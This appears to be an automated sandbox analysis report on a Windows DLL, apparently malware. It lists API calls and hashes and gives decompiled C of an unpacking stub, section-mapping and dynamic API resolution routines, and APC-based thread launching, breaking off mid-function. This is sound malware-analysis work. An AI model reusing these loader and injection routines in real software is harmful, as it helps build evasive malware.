              • Opcode ID: a130cd58009ec03e88894f727ffc434a8ab414368446440ebed0c4a75e4c71a3
              • Instruction ID: 706025769fbe77e4a28b6b92e08f17182ff787be2a26e52ff9da0bbcc658df2e
              • Opcode Fuzzy Hash: a130cd58009ec03e88894f727ffc434a8ab414368446440ebed0c4a75e4c71a3
              • Instruction Fuzzy Hash: E6213BB362810DAFEB448AE9AC45FFA33AEDB45761F504535F908C7180FB73DA108690
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • _malloc.LIBCMT ref: 6E22F774
                • Part of subcall function 6E224E76: __FF_MSGBANNER.LIBCMT ref: 6E224E8D
                • Part of subcall function 6E224E76: __NMSG_WRITE.LIBCMT ref: 6E224E94
                • Part of subcall function 6E224E76: RtlAllocateHeap.NTDLL(6E2959B8,00000000,00000001), ref: 6E224EB9
              • _free.LIBCMT ref: 6E22F787
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: AllocateHeap_free_malloc
              • String ID:
              • API String ID: 1020059152-0
              • Opcode ID: a21a2f0f7ca1c9cbce24ee946850e3ce78982631e02ebd316f37c6ad7520694d
              • Instruction ID: 2a10e2b7a5c32affc8b1445ad24871128c017ce3979bc7d6f16a9dc870975e25
              • Opcode Fuzzy Hash: a21a2f0f7ca1c9cbce24ee946850e3ce78982631e02ebd316f37c6ad7520694d
              • Instruction Fuzzy Hash: D011CA3691461F9FFF611FF89854A8B37DBAF05379F304936F908AA180EB74848086E4
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 6E221FF5: __getptd_noexit.LIBCMT ref: 6E221FF6
                • Part of subcall function 6E221FF5: __amsg_exit.LIBCMT ref: 6E222003
              • __amsg_exit.LIBCMT ref: 6E22195F
              • __lock.LIBCMT ref: 6E22196F
              • _free.LIBCMT ref: 6E22199C
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: __amsg_exit$__getptd_noexit__lock_free
              • String ID: F)n
              • API String ID: 3054295789-455955172
              • Opcode ID: bb6dae0eb77d9adf97ddc62b227f6f3178c5c820fc4a1a78fe88f3b0a8369f1e
              • Instruction ID: 28a04ea06208bf68ecd72fe695767930c2cb6358b5aa497ff02029938896fdf2
              • Opcode Fuzzy Hash: bb6dae0eb77d9adf97ddc62b227f6f3178c5c820fc4a1a78fe88f3b0a8369f1e
              • Instruction Fuzzy Hash: 2A11A535D01A6F9FCB509FEA8440F8DB3E67F05B21B150529D474A7280CB395986CFD5
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6E23CB95
              • __isleadbyte_l.LIBCMT ref: 6E23CBC3
              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 6E23CBF1
              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 6E23CC27
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
              • String ID:
              • API String ID: 3058430110-0
              • Opcode ID: 1909cc19a61a1a17949f628dfebf427fb23bf0321f6290863e8d73ee3b8edeb9
              • Instruction ID: a1145c35da36b566790ba9e4a56cec1f720db70330db6cdb6ebd5ff284bac845
              • Opcode Fuzzy Hash: 1909cc19a61a1a17949f628dfebf427fb23bf0321f6290863e8d73ee3b8edeb9
              • Instruction Fuzzy Hash: 7831057050427FAFDB118EB5C846BAA7BA7FF01721F254829E4618B190E731D450DFA0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • ___BuildCatchObject.LIBCMT ref: 6E22633B
                • Part of subcall function 6E226A30: ___BuildCatchObjectHelper.LIBCMT ref: 6E226A62
                • Part of subcall function 6E226A30: ___AdjustPointer.LIBCMT ref: 6E226A79
              • _UnwindNestedFrames.LIBCMT ref: 6E226352
              • ___FrameUnwindToState.LIBCMT ref: 6E226364
              • CallCatchBlock.LIBCMT ref: 6E226388
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
              • String ID:
              • API String ID: 2901542994-0
              • Opcode ID: f043bd799ec794dcdbd96a67b851ac0f7d1579d04b3c6502d4da18ff498105f8
              • Instruction ID: ee0afe558ddf0337d7cfce0a731354002d2884e81c01789a62bf030c85e24bd3
              • Opcode Fuzzy Hash: f043bd799ec794dcdbd96a67b851ac0f7d1579d04b3c6502d4da18ff498105f8
              • Instruction Fuzzy Hash: B301173201014DEFCF025F95DC40EDA7BBAFF48B54F058424FA1866120C372E5619FA0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
              • String ID:
              • API String ID: 3016257755-0
              • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
              • Instruction ID: 494249a2afee8a6f63858aff78b1f8147ea0c4a96904d87ad01eff588c94aa35
              • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
              • Instruction Fuzzy Hash: BF01333644828EBFCF125EC4CC11DEE3F27BB19355B458925FE28981A0C336D6B1AB81
              Uniqueness

              Uniqueness Score: -1.00%

              Executed Functions

              APIs
              • VirtualAlloc.KERNELBASE(00000000,000006AB,00003000,00000040,000006AB,6E296BE0), ref: 6E297245
              • VirtualAlloc.KERNEL32(00000000,00000314,00003000,00000040,6E296C41), ref: 6E29727C
              • VirtualAlloc.KERNEL32(00000000,0000EC31,00003000,00000040), ref: 6E2972DC
              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E297312
              • VirtualProtect.KERNEL32(6E1C0000,00000000,00000004,6E297167), ref: 6E297417
              • VirtualProtect.KERNEL32(6E1C0000,00001000,00000004,6E297167), ref: 6E29743E
              • VirtualProtect.KERNEL32(00000000,?,00000002,6E297167), ref: 6E29750B
              • VirtualProtect.KERNEL32(00000000,?,00000002,6E297167,?), ref: 6E297561
              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E29757D
              Memory Dump Source
              • Source File: 00000004.00000002.464772699.000000006E296000.00000040.00020000.sdmp, Offset: 6E296000, based on PE: false
              Similarity
              • API ID: Virtual$Protect$Alloc$Free
              • String ID:
              • API String ID: 2574235972-0
              • Opcode ID: 809c7055cc761c65bd0d80cc4914a0d3f47182814d01b9dbc598a8231fe2a8b3
              • Instruction ID: 1680e39e4f1abc5d00b3de2304b19bf1a97eaed0b398433b3e31cdd07c0bbce8
              • Opcode Fuzzy Hash: 809c7055cc761c65bd0d80cc4914a0d3f47182814d01b9dbc598a8231fe2a8b3
              • Instruction Fuzzy Hash: D2D19D36500203AFDB16CF55C8A0B5177A6FF89310B0B4598ED1AEF3DAD771A80ADB64
              Uniqueness

              Uniqueness Score: -1.00%

              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.464458937.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID:
              • String ID: PR)n$T$W
              • API String ID: 0-3270365719
              • Opcode ID: e951073df6e2001df1faf367814b67fef01e31d65a272cf1ce0837f7aa57a745
              • Instruction ID: 3d9fb1e5917b4f8cb47394d87f31f94bc9fe20393a7096d78658644b2affa550
              • Opcode Fuzzy Hash: e951073df6e2001df1faf367814b67fef01e31d65a272cf1ce0837f7aa57a745
              • Instruction Fuzzy Hash: D092A0B1A597528FDB04CFBAD49825ABBE3BB9A306F24592EE494C3344D3348449CF71
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 72%
              			E6E1C1B9C(intOrPtr* __eax, void** _a4) {
              				int _v12;
              				void* _v16;
              				void* _v20;
              				void* _v24;
              				int _v28;
              				int _v32;
              				intOrPtr _v36;
              				int _v40;
              				int _v44;
              				void* _v48;
              				void* __esi;
              				long _t34;
              				void* _t39;
              				void* _t47;
              				intOrPtr* _t48;
              
              				_t48 = __eax;
              				asm("stosd");
              				asm("stosd");
              				asm("stosd");
              				asm("stosd");
              				asm("stosd");
              				asm("stosd");
              				_v24 =  *((intOrPtr*)(__eax + 4));
              				_v16 = 0;
              				_v12 = 0;
              				_v48 = 0x18;
              				_v44 = 0;
              				_v36 = 0x40;
              				_v40 = 0;
              				_v32 = 0;
              				_v28 = 0;
              				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
              				if(_t34 < 0) {
              					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
              				} else {
              					 *_t48 = _v16;
              					_t39 = E6E1C1EC7(_t48,  &_v12); // executed
              					_t47 = _t39;
              					if(_t47 != 0) {
              						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
              					} else {
              						memset(_v12, 0, _v24);
              						 *_a4 = _v12;
              					}
              				}
              				return _t47;
              			}


              APIs
              • NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 6E1C1BF9
                • Part of subcall function 6E1C1EC7: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E1C1C0E,00000002,00000000,?,?,00000000,?,?,6E1C1C0E,00000000), ref: 6E1C1EF4
              • memset.NTDLL ref: 6E1C1C1B
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.464370072.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000004.00000002.464353477.000000006E1C0000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.464387717.000000006E1C3000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.464410196.000000006E1C5000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.464423958.000000006E1C6000.00000002.00020000.sdmp
              Similarity
              • API ID: Section$CreateViewmemset
              • String ID: @
              • API String ID: 2533685722-2766056989
              • Opcode ID: 4d7eee9f11a7039b7ba48ef3c3db40ff58bda86e38dd00c02ef6a9748d42a3ba
              • Instruction ID: 067a5a76a8e38c74908698a99dda20eae672e85973d2ed78bdf25e3c1e7eb3c7
              • Opcode Fuzzy Hash: 4d7eee9f11a7039b7ba48ef3c3db40ff58bda86e38dd00c02ef6a9748d42a3ba
              • Instruction Fuzzy Hash: DA213BB1E0020DAFCB01CFE9C8809DEFBB9EB18704F504829E505F3210D7349A489B65
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 68%
              			E6E1C1EC7(void** __esi, PVOID* _a4) {
              				long _v8;
              				void* _v12;
              				void* _v16;
              				long _t13;
              
              				_v16 = 0;
              				asm("stosd");
              				_v8 = 0;
              				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
              				if(_t13 < 0) {
              					_push(_t13);
              					return __esi[6]();
              				}
              				return 0;
              			}


              APIs
              • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E1C1C0E,00000002,00000000,?,?,00000000,?,?,6E1C1C0E,00000000), ref: 6E1C1EF4
              Memory Dump Source
              • Source File: 00000004.00000002.464370072.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000004.00000002.464353477.000000006E1C0000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.464387717.000000006E1C3000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.464410196.000000006E1C5000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.464423958.000000006E1C6000.00000002.00020000.sdmp
              Similarity
              • API ID: SectionView
              • String ID:
              • API String ID: 1323581903-0
              • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
              • Instruction ID: dabc91180f7c6157f8bcab1383139ececdf6d6b3fd02e34d867a97413a3254f7
              • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
              • Instruction Fuzzy Hash: EBF082B690020CBFEB119FA5CC84C9FBBBDEB44354B104939F152E1090D2309E4C9A60
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 80%
              			E6E1C1C7D(intOrPtr _a4) {
              				char _v28;
              				struct _SYSTEMTIME _v44;
              				char _v48;
              				long _v52;
              				long _v56;
              				void* __edi;
              				long _t21;
              				int _t23;
              				long _t26;
              				long _t27;
              				long _t31;
              				void* _t37;
              				intOrPtr _t39;
              				intOrPtr _t44;
              				signed int _t45;
              				void* _t50;
              				signed int _t54;
              				void* _t56;
              				intOrPtr* _t57;
              
              				_t21 = E6E1C1F10();
              				_v52 = _t21;
              				if(_t21 != 0) {
              					L18:
              					return _t21;
              				} else {
              					goto L1;
              				}
              				do {
              					L1:
              					GetSystemTime( &_v44);
              					_t23 = SwitchToThread();
              					asm("cdq");
              					_t45 = 9;
              					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
              					_t26 = E6E1C18AD(0, _t54); // executed
              					_v56 = _t26;
              					Sleep(_t54 << 5); // executed
              					_t21 = _v56;
              				} while (_t21 == 0xc);
              				if(_t21 != 0) {
              					goto L18;
              				}
              				_t27 = E6E1C1ADB(_t45); // executed
              				_v52 = _t27;
              				if(_t27 != 0) {
              					L16:
              					_t21 = _v52;
              					if(_t21 == 0xffffffff) {
              						_t21 = GetLastError();
              					}
              					goto L18;
              				}
              				if(_a4 != 0) {
              					L11:
              					_push(0);
              					_t56 = E6E1C13D1(E6E1C14E8,  &_v28);
              					if(_t56 == 0) {
              						_v56 = GetLastError();
              					} else {
              						_t31 = WaitForSingleObject(_t56, 0xffffffff);
              						_v56 = _t31;
              						if(_t31 == 0) {
              							GetExitCodeThread(_t56,  &_v56);
              						}
              						CloseHandle(_t56);
              					}
              					goto L16;
              				}
              				if(E6E1C134F(_t45,  &_v48) != 0) {
              					 *0x6e1c41b8 = 0;
              					goto L11;
              				}
              				_t44 = _v48;
              				_t57 = __imp__GetLongPathNameW;
              				_t37 =  *_t57(_t44, 0, 0); // executed
              				_t50 = _t37;
              				if(_t50 == 0) {
              					L9:
              					 *0x6e1c41b8 = _t44;
              					goto L11;
              				}
              				_t15 = _t50 + 2; // 0x2
              				_t39 = E6E1C1B58(_t50 + _t15);
              				 *0x6e1c41b8 = _t39;
              				if(_t39 == 0) {
              					goto L9;
              				} else {
              					 *_t57(_t44, _t39, _t50); // executed
              					E6E1C142F(_t44);
              					goto L11;
              				}
              			}


              APIs
                • Part of subcall function 6E1C1F10: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E1C1C8E,74B063F0,00000000), ref: 6E1C1F1F
                • Part of subcall function 6E1C1F10: GetVersion.KERNEL32 ref: 6E1C1F2E
                • Part of subcall function 6E1C1F10: GetCurrentProcessId.KERNEL32 ref: 6E1C1F3D
                • Part of subcall function 6E1C1F10: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E1C1F56
              • GetSystemTime.KERNEL32(?,74B063F0,00000000), ref: 6E1C1CA1
              • SwitchToThread.KERNEL32 ref: 6E1C1CA7
                • Part of subcall function 6E1C18AD: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6E1C1903
                • Part of subcall function 6E1C18AD: memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6E1C19C9
              • Sleep.KERNELBASE(00000000,00000000), ref: 6E1C1CCA
              • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E1C1D12
              • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E1C1D30
              • WaitForSingleObject.KERNEL32(00000000,000000FF,6E1C14E8,?,00000000), ref: 6E1C1D62
              • GetExitCodeThread.KERNEL32(00000000,?), ref: 6E1C1D76
              • CloseHandle.KERNEL32(00000000), ref: 6E1C1D7D
              • GetLastError.KERNEL32(6E1C14E8,?,00000000), ref: 6E1C1D85
              • GetLastError.KERNEL32 ref: 6E1C1D98
              Memory Dump Source
              • Source File: 00000004.00000002.464370072.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000004.00000002.464353477.000000006E1C0000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.464387717.000000006E1C3000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.464410196.000000006E1C5000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.464423958.000000006E1C6000.00000002.00020000.sdmp
              Similarity
              • API ID: ErrorLastLongNamePathProcessThread$AllocCloseCodeCreateCurrentEventExitHandleObjectOpenSingleSleepSwitchSystemTimeVersionVirtualWaitmemcpy
              • String ID:
              • API String ID: 1962885430-0
              • Opcode ID: fdc9e92d1d465907f22880ace846725f18fdaa1e58afd678a08990da24bed37b
              • Instruction ID: 05e1698dc7c22bdfe323542b900fa9b2a15442dbdee2dd94200ac244c9319a58
              • Opcode Fuzzy Hash: fdc9e92d1d465907f22880ace846725f18fdaa1e58afd678a08990da24bed37b
              • Instruction Fuzzy Hash: B531A7726847419BC750DFE5884C9AF7AFDAFA6F58B104916F894C2140EB3CC489A7A3
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 69%
              			E6E1C1144(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
              				intOrPtr _v12;
              				struct _FILETIME* _v16;
              				short _v60;
              				struct _FILETIME* _t14;
              				intOrPtr _t15;
              				long _t18;
              				void* _t19;
              				void* _t22;
              				intOrPtr _t31;
              				long _t32;
              				void* _t34;
              
              				_t31 = __edx;
              				_t14 =  &_v16;
              				GetSystemTimeAsFileTime(_t14);
              				_push(0x192);
              				_push(0x54d38000);
              				_push(_v12);
              				_push(_v16);
              				L6E1C2210();
              				_push(_t14);
              				_v16 = _t14;
              				_t15 =  *0x6e1c41d0;
              				_push(_t15 + 0x6e1c505e);
              				_push(_t15 + 0x6e1c5054);
              				_push(0x16);
              				_push( &_v60);
              				_v12 = _t31;
              				L6E1C220A();
              				_t18 = _a4;
              				if(_t18 == 0) {
              					_t18 = 0x1000;
              				}
              				_t19 = CreateFileMappingW(0xffffffff, 0x6e1c41c0, 4, 0, _t18,  &_v60); // executed
              				_t34 = _t19;
              				if(_t34 == 0) {
              					_t32 = GetLastError();
              				} else {
              					if(_a4 != 0 || GetLastError() == 0xb7) {
              						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
              						if(_t22 == 0) {
              							_t32 = GetLastError();
              							if(_t32 != 0) {
              								goto L9;
              							}
              						} else {
              							 *_a8 = _t34;
              							 *_a12 = _t22;
              							_t32 = 0;
              						}
              					} else {
              						_t32 = 2;
              						L9:
              						CloseHandle(_t34);
              					}
              				}
              				return _t32;
              			}


              APIs
              • GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6E1C156A,0000000A,?,?), ref: 6E1C1151
              • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E1C1167
              • _snwprintf.NTDLL ref: 6E1C118C
              • CreateFileMappingW.KERNELBASE(000000FF,6E1C41C0,00000004,00000000,?,?), ref: 6E1C11B1
              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1C156A,0000000A,?), ref: 6E1C11C8
              • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6E1C11DC
              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1C156A,0000000A,?), ref: 6E1C11F4
              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E1C156A,0000000A), ref: 6E1C11FD
              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1C156A,0000000A,?), ref: 6E1C1205
              Memory Dump Source
              • Source File: 00000004.00000002.464370072.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000004.00000002.464353477.000000006E1C0000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.464387717.000000006E1C3000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.464410196.000000006E1C5000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.464423958.000000006E1C6000.00000002.00020000.sdmp
              Similarity
              • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
              • String ID:
              • API String ID: 1724014008-0
              • Opcode ID: c60262e967d796770997ba4527c8b51bef56c7ab98e41e8c78b434eff493d3c0
              • Instruction ID: 803b6c2780bf403bb96ebac22d9f8b35b69169cd61ce97a2e769f5d4ec081a58
              • Opcode Fuzzy Hash: c60262e967d796770997ba4527c8b51bef56c7ab98e41e8c78b434eff493d3c0
              • Instruction Fuzzy Hash: 0421D672640108BFDB01AFE8CC88EDE7BB9EB65B50F214165F915E7140D63C5C85EB62
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E6E1C1060(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
              				intOrPtr _v8;
              				_Unknown_base(*)()* _t29;
              				_Unknown_base(*)()* _t33;
              				_Unknown_base(*)()* _t36;
              				_Unknown_base(*)()* _t39;
              				_Unknown_base(*)()* _t42;
              				intOrPtr _t46;
              				struct HINSTANCE__* _t50;
              				intOrPtr _t56;
              
              				_t56 = E6E1C1B58(0x20);
              				if(_t56 == 0) {
              					_v8 = 8;
              				} else {
              					_t50 = GetModuleHandleA( *0x6e1c41d0 + 0x6e1c5014);
              					_v8 = 0x7f;
              					_t29 = GetProcAddress(_t50,  *0x6e1c41d0 + 0x6e1c50e1);
              					 *(_t56 + 0xc) = _t29;
              					if(_t29 == 0) {
              						L8:
              						E6E1C142F(_t56);
              					} else {
              						_t33 = GetProcAddress(_t50,  *0x6e1c41d0 + 0x6e1c50f1);
              						 *(_t56 + 0x10) = _t33;
              						if(_t33 == 0) {
              							goto L8;
              						} else {
              							_t36 = GetProcAddress(_t50,  *0x6e1c41d0 + 0x6e1c5104);
              							 *(_t56 + 0x14) = _t36;
              							if(_t36 == 0) {
              								goto L8;
              							} else {
              								_t39 = GetProcAddress(_t50,  *0x6e1c41d0 + 0x6e1c5119);
              								 *(_t56 + 0x18) = _t39;
              								if(_t39 == 0) {
              									goto L8;
              								} else {
              									_t42 = GetProcAddress(_t50,  *0x6e1c41d0 + 0x6e1c512f);
              									 *(_t56 + 0x1c) = _t42;
              									if(_t42 == 0) {
              										goto L8;
              									} else {
              										 *((intOrPtr*)(_t56 + 8)) = _a8;
              										 *((intOrPtr*)(_t56 + 4)) = _a4;
              										_t46 = E6E1C1B9C(_t56, _a12); // executed
              										_v8 = _t46;
              										if(_t46 != 0) {
              											goto L8;
              										} else {
              											 *_a16 = _t56;
              										}
              									}
              								}
              							}
              						}
              					}
              				}
              				return _v8;
              			}


              APIs
                • Part of subcall function 6E1C1B58: HeapAlloc.KERNEL32(00000000,?,6E1C1702,?,00000000,00000000,?,?,?,6E1C1CE6), ref: 6E1C1B64
              • GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6E1C1480,?,?,?,?,00000002,00000000,?,?), ref: 6E1C1084
              • GetProcAddress.KERNEL32(00000000,?), ref: 6E1C10A6
              • GetProcAddress.KERNEL32(00000000,?), ref: 6E1C10BC
              • GetProcAddress.KERNEL32(00000000,?), ref: 6E1C10D2
              • GetProcAddress.KERNEL32(00000000,?), ref: 6E1C10E8
              • GetProcAddress.KERNEL32(00000000,?), ref: 6E1C10FE
                • Part of subcall function 6E1C1B9C: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 6E1C1BF9
                • Part of subcall function 6E1C1B9C: memset.NTDLL ref: 6E1C1C1B
              Memory Dump Source
              • Source File: 00000004.00000002.464370072.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000004.00000002.464353477.000000006E1C0000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.464387717.000000006E1C3000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.464410196.000000006E1C5000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.464423958.000000006E1C6000.00000002.00020000.sdmp
              Similarity
              • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
              • String ID:
              • API String ID: 1632424568-0
              • Opcode ID: 6c491f257b895694d05b118b3e60ec4a510c9f5036a9515af6d925cca7394367
              • Instruction ID: c55f6172b4d60dac4960483c3967355f82887751ae68e4afe54efec6a1ecb65d
              • Opcode Fuzzy Hash: 6c491f257b895694d05b118b3e60ec4a510c9f5036a9515af6d925cca7394367
              • Instruction Fuzzy Hash: B021A5F160060B9FDB40EFA9DC84D5A7BFCFB65E44B104415E989D7201E33CE906AB61
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 86%
              			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
              				long _v8;
              				void* __edi;
              				void* __esi;
              				void* __ebp;
              				char _t9;
              				void* _t10;
              				void* _t18;
              				void* _t23;
              				void* _t36;
              
              				_push(__ecx);
              				_t9 = _a8;
              				_v8 = 1;
              				if(_t9 == 0) {
              					_t10 = InterlockedDecrement(0x6e1c4188);
              					__eflags = _t10;
              					if(_t10 == 0) {
              						__eflags =  *0x6e1c418c;
              						if( *0x6e1c418c != 0) {
              							_t36 = 0x2328;
              							while(1) {
              								SleepEx(0x64, 1);
              								__eflags =  *0x6e1c4198;
              								if( *0x6e1c4198 == 0) {
              									break;
              								}
              								_t36 = _t36 - 0x64;
              								__eflags = _t36;
              								if(_t36 > 0) {
              									continue;
              								}
              								break;
              							}
              							CloseHandle( *0x6e1c418c);
              						}
              						HeapDestroy( *0x6e1c4190);
              					}
              				} else {
              					if(_t9 == 1 && InterlockedIncrement(0x6e1c4188) == 1) {
              						_t18 = HeapCreate(0, 0x400000, 0); // executed
              						_t41 = _t18;
              						 *0x6e1c4190 = _t18;
              						if(_t18 == 0) {
              							L6:
              							_v8 = 0;
              						} else {
              							 *0x6e1c41b0 = _a4;
              							asm("lock xadd [eax], edi");
              							_push( &_a8);
              							_t23 = E6E1C13D1(E6E1C20CE, E6E1C121C(_a12, 1, 0x6e1c4198, _t41));
              							 *0x6e1c418c = _t23;
              							if(_t23 == 0) {
              								asm("lock xadd [esi], eax");
              								goto L6;
              							}
              						}
              					}
              				}
              				return _v8;
              			}

              APIs
              • InterlockedIncrement.KERNEL32(6E1C4188), ref: 6E1C1DD0
              • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E1C1DE5
                • Part of subcall function 6E1C13D1: CreateThread.KERNELBASE ref: 6E1C13E8
                • Part of subcall function 6E1C13D1: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1C13FD
                • Part of subcall function 6E1C13D1: GetLastError.KERNEL32(00000000), ref: 6E1C1408
                • Part of subcall function 6E1C13D1: TerminateThread.KERNEL32(00000000,00000000), ref: 6E1C1412
                • Part of subcall function 6E1C13D1: CloseHandle.KERNEL32(00000000), ref: 6E1C1419
                • Part of subcall function 6E1C13D1: SetLastError.KERNEL32(00000000), ref: 6E1C1422
              • InterlockedDecrement.KERNEL32(6E1C4188), ref: 6E1C1E38
              • SleepEx.KERNEL32(00000064,00000001), ref: 6E1C1E52
              • CloseHandle.KERNEL32 ref: 6E1C1E6E
              • HeapDestroy.KERNEL32 ref: 6E1C1E7A
              Memory Dump Source
              • Source File: 00000004.00000002.464370072.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000004.00000002.464353477.000000006E1C0000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.464387717.000000006E1C3000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.464410196.000000006E1C5000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.464423958.000000006E1C6000.00000002.00020000.sdmp
              Similarity
              • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
              • String ID:
              • API String ID: 2110400756-0
              • Opcode ID: 93c57b8fb87c938260d5d050e5ec8779caa9878904f591e7b09f614ed0812f3f
              • Instruction ID: 8f3352a58246418d07f1a9f43faede5fccf891133e5ec329b7854fec8119d5f0
              • Opcode Fuzzy Hash: 93c57b8fb87c938260d5d050e5ec8779caa9878904f591e7b09f614ed0812f3f
              • Instruction Fuzzy Hash: 4821CF36744601AFEB019FE9C88CA4A3FB8F772E603218125E448D3140D23CA986FB52
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			// Thread start via APC: the new thread's start routine is the imported SleepEx itself (the sleep
              			// length is the global at 0x6e1c41cc), so the thread begins inside a sleep and the real routine
              			// handed in by _entry_ is delivered with QueueUserAPC. If the APC cannot be queued, the thread is
              			// terminated, the handle closed and the original error code preserved; the caller then sees NULL.
              			E6E1C13D1(long _a4, DWORD* _a12) {
              				_Unknown_base(*)()* _v0;
              				void* _t4;
              				long _t6;
              				long _t11;
              				void* _t13;
              
              				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e1c41cc, 0, _a12); // executed
              				_t13 = _t4;
              				if(_t13 != 0) {
              					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
              					if(_t6 == 0) {
              						_t11 = GetLastError();
              						TerminateThread(_t13, _t11);
